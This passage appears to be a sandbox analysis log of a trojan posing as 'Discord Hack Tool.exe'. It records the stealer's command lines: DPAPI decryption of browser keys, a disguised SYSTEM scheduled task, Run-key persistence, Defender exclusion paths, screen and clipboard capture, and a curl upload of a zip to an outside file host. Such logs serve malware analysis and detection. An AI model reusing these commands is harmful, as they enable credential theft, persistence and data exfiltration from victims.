PID 5728 wrote to memory of 2056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://mega.nz/file/ps1WVI4C#4Ora6QCwbLreKoWbQVQCdGpJze4nYQdeHyypMx-b2dU

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffac1093cb8,0x7ffac1093cc8,0x7ffac1093cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1828 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5072 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004C8

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6196 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5588 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13

C:\Users\Admin\Downloads\Discord Hack Tool.exe

"C:\Users\Admin\Downloads\Discord Hack Tool.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lkpv3aqj\lkpv3aqj.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5743.tmp" "c:\Users\Admin\AppData\Local\Temp\lkpv3aqj\CSCFE21C5C5317A4A3B81B3616149D2A28F.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"

C:\Windows\system32\taskkill.exe

taskkill /IM msedge.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,211,28,158,119,153,136,182,186,182,140,27,224,31,42,98,129,163,229,214,162,157,251,88,76,220,88,221,7,153,80,43,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,73,238,243,217,56,219,60,215,158,4,156,83,176,178,11,120,89,232,124,19,242,192,178,55,240,49,194,69,138,96,135,246,48,0,0,0,247,207,103,230,202,205,245,16,28,172,229,124,165,210,103,11,12,196,151,9,133,66,194,65,60,120,27,246,170,191,96,70,11,157,69,109,12,146,76,15,40,174,22,143,72,151,144,247,64,0,0,0,115,234,32,151,10,195,106,72,177,234,146,232,226,223,217,32,37,34,73,140,60,63,44,119,69,178,221,216,32,90,64,50,251,204,43,72,162,246,93,112,88,166,6,206,203,162,130,9,122,1,244,137,33,40,119,80,4,220,69,84,249,136,212,38), $null, 'CurrentUser')"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,211,28,158,119,153,136,182,186,182,140,27,224,31,42,98,129,163,229,214,162,157,251,88,76,220,88,221,7,153,80,43,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,73,238,243,217,56,219,60,215,158,4,156,83,176,178,11,120,89,232,124,19,242,192,178,55,240,49,194,69,138,96,135,246,48,0,0,0,247,207,103,230,202,205,245,16,28,172,229,124,165,210,103,11,12,196,151,9,133,66,194,65,60,120,27,246,170,191,96,70,11,157,69,109,12,146,76,15,40,174,22,143,72,151,144,247,64,0,0,0,115,234,32,151,10,195,106,72,177,234,146,232,226,223,217,32,37,34,73,140,60,63,44,119,69,178,221,216,32,90,64,50,251,204,43,72,162,246,93,112,88,166,6,206,203,162,130,9,122,1,244,137,33,40,119,80,4,220,69,84,249,136,212,38), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,31,48,144,108,207,129,155,216,190,151,157,5,189,241,192,119,137,99,209,251,98,98,91,220,150,5,90,153,197,206,48,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,13,137,9,5,230,251,57,83,172,255,40,11,186,253,131,189,197,13,86,207,38,80,198,155,11,79,187,135,218,23,125,55,48,0,0,0,113,8,144,157,12,116,63,185,105,105,23,186,43,229,43,106,179,77,150,110,109,71,254,235,182,187,4,154,144,64,102,67,123,244,131,194,46,176,17,65,169,35,210,81,155,166,172,206,64,0,0,0,116,145,179,250,150,114,228,181,200,106,171,97,108,118,55,142,78,175,172,137,114,215,45,79,209,59,230,217,8,171,32,40,184,211,189,34,198,199,25,17,191,228,191,12,253,74,212,79,132,18,215,250,7,249,108,169,123,58,128,185,63,77,159,138), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,31,48,144,108,207,129,155,216,190,151,157,5,189,241,192,119,137,99,209,251,98,98,91,220,150,5,90,153,197,206,48,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,13,137,9,5,230,251,57,83,172,255,40,11,186,253,131,189,197,13,86,207,38,80,198,155,11,79,187,135,218,23,125,55,48,0,0,0,113,8,144,157,12,116,63,185,105,105,23,186,43,229,43,106,179,77,150,110,109,71,254,235,182,187,4,154,144,64,102,67,123,244,131,194,46,176,17,65,169,35,210,81,155,166,172,206,64,0,0,0,116,145,179,250,150,114,228,181,200,106,171,97,108,118,55,142,78,175,172,137,114,215,45,79,209,59,230,217,8,171,32,40,184,211,189,34,198,199,25,17,191,228,191,12,253,74,212,79,132,18,215,250,7,249,108,169,123,58,128,185,63,77,159,138), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get serialnumber

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""

C:\Windows\system32\cscript.exe

cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\alkib1u5\alkib1u5.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5EE4.tmp" "c:\Users\Admin\AppData\Local\Temp\alkib1u5\CSC7E947611C34014BACF222DB2E44B9.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Description,PNPDeviceID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic memorychip get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get processorid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\getmac.exe

getmac /NH

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\Downloads\Discord Hack Tool.exe" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Aoyvszio.zip";"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\curl.exe

curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Aoyvszio.zip";

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

